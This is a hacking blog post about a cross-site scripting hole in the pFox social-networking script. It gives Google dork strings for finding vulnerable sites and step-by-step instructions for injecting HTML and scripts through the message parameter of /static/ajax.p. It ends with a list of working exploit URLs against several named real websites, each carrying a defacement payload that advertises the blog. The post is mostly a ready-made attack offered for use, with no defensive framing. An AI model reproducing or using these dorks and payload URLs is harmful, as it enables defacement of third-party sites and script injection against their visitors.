PFox is a P Script For Making Social Networking website, Similiar toFacebook.
3.1 and some other versions of PFox are vulnerable For XSS.
Google Dork :
"intext:© · English (US) Powered By pFox Version 3.0.1."
"inurl:/static/ajax.p?core"
Open any website for srch results with text :© · English (US) Powered By pFox Version 3.0.1
or url xyz.com/static/ajax.p?core
now You'll Get something Like This URL give below
http://www.devilscafe.in/static/ajax.p?core[ajax]=true&core[call]=core.message&height=150&width=300&message=<div class="error_message">some message here&core[security_token]=99d754d2b583565369e194e30abcbc
Now Chnage the Text &Message= blah blah blah.... (you have to replace the red text with your html Tags)
for example
http://www.devilscafe.in/static/ajax.p?core[ajax]=true&core[call]=core.message&height=150&width=300&message=
<center><fontcolor="red"><h2>XSS</h2><br><h1>www.devilscafe.in</h1><ahref='http://www.devilscafe.in'><imgsrc="http://i55.tinypic.com/14uuv14.png"/>&core[security_token]=99d754d2b583565369e194e30abcbc
You can use multiple html Tags, and scripts here For details CheckThis Post
Live examples :
http://onlinesocial.in/static/ajax.p?core[ajax]=true&core[call]=core.message&height=150&width=300&message=<center><font color="red"><h2>XSS</h2><br><h1>www.devilscafe.in</h1><a href='http://www.devilscafe.in'><img src="http://i55.tinypic.com/14uuv14.png"/>&core[security_token]=99d754d2b583565369e194e30abcbc
http://www.marshable.net/static/ajax.p?core[ajax]=true&core[call]=core.message&core[security_token]=860eb6a699d5d9f375b5e8cf0021c094&height=150&message= <center><font color="red"><h2>XSS</h2><br><h1>www.devilscafe.in</h1><a href='http://www.devilscafe.in'><img src="http://i55.tinypic.com/14uuv14.png"/>
http://artistiimeinc.com/static/ajax.p?core[ajax]=true&core[call]=core.message&core[security_token]=860eb6a699d5d9f375b5e8cf0021c094&height=150&message=%20<center><font%20color="red"><h2>XSS</h2><br><h1>www.devilscafe.in</h1><a%20href='http://www.devilscafe.in'><img%20src="http://i55.tinypic.com/14uuv14.png"/>
http://mstudio84.com/gist/static/ajax.p?core[ajax]=true&core[call]=core.message&core[security_token]=860eb6a699d5d9f375b5e8cf0021c094&height=150&message=%20%3Ccenter%3E%3Cfont%20color=%22red%22%3E%3Ch2%3EXSS%3C/h2%3E%3Cbr%3E%3Ch1%3Ewww.devilscafe.in%3C/h1%3E%3Ca%20href='http://www.devilscafe.in'%3E%3Cimg%20src=%22http://i55.tinypic.com/14uuv14.png%22/%3E
http://parsdb.ir/accessories/social_network/static/ajax.p?core[ajax]=true&core[call]=core.message&core[security_token]=860eb6a699d5d9f375b5e8cf0021c094&height=150&message=%20%3Ccenter%3E%3Cfont%20color=%22red%22%3E%3Ch2%3EXSS%3C/h2%3E%3Cbr%3E%3Ch1%3Ewww.devilscafe.in%3C/h1%3E%3Ca%20href='http://www.devilscafe.in'%3E%3Cimg%20src=%22http://i55.tinypic.com/14uuv14.png%22/%3E
http://sohiran.ir/fb/static/ajax.p?core[ajax]=true&core[call]=core.message&core[security_token]=860eb6a699d5d9f375b5e8cf0021c094&height=150&message=%20%3Ccenter%3E%3Cfont%20color=%22red%22%3E%3Ch2%3EXSS%3C/h2%3E%3Cbr%3E%3Ch1%3Ewww.devilscafe.in%3C/h1%3E%3Ca%20href='http://www.devilscafe.in'%3E%3Cimg%20src=%22http://i55.tinypic.com/14uuv14.png%22/%3E
No comments:
Post a Comment